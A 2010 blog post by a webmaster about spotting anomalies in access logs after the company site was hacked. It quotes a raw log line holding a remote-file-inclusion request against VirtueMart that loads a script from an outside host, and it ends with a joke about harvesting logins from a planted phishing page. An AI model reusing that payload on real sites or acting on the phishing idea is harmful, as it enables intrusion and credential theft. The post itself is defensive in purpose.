Sunday, August 29, 2010

Webmaster - The Operator in Matrix

I have been a webmaster of our company website for a few months now, and it reminds me of the Operator in the Matrix.


After the company website got hacked, I took on the role of maintaining the website as well.  I find myself parsing through access and error logs looking for anomalies.  To the average Joe, I guess it could look a lot like the Matrix.

However, staring at the "Matrix" has proven to be quite informative.  Although I found no hot blonde in red dress, I did learn a think or two about the www.  I didn't realized there are so many search engines out there. Here are a few I spotted in our access logs:

  1. Google
  2. Yahoo (slurp)
  3. Baidu
  4. MSN
  5. Sogou
  6. Youdao
  7. Soso
Deja Vu in the Matrix? I got a few of those.  Here are a few anomalies I spotted:
89.108.67.164 - - [31/Jul/2010:20:33:55 +0800] "GET /website/index.php/component/virtuemart/details/117/69/remote-power-control/server-technology/switched-cdu///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 200 45891 "-" "libwww-perl/5.812"
Spot anything?  Turns out it is an attempt to exploit a vulnerability in VirtueMart <=1.1.3.  Good things since I have re-did the website, I know exactly what is in it.  I have *all* the website components' release RSS feed in my Google Reader, setup up some kind of test-bed and source control, and make it a habit of patching the website soon after a release.  For the nitpicker smarty-pants out there, no I don't mean all the components of the website, that is why the *all* is quoted with a asterisks. I am not maintaining the website's Apache, PHP and MySQL infrastructure, let's hope our web-hosting company do a good job in maintaining that.
66.113.102.253 - - [31/Jul/2010:21:41:39 +0800] "GET /website/components/chase.com/logon_confirm/index.htm HTTP/1.1" 404 2203 "-" "Mozilla/5.0 (compatible; Fedora Core 5) FC5 KDE"
Looks like the hacker's script which planted the phony JP Morgan Chase page on our website back in March still thinks we are hosting their page.  Hmm.... since the hacker is already directing traffic to our site, maybe I should rebuild the Logon page and collect the login information for my evil use.


Arrwaaaaaa hahahhaha! (The Evil laughter)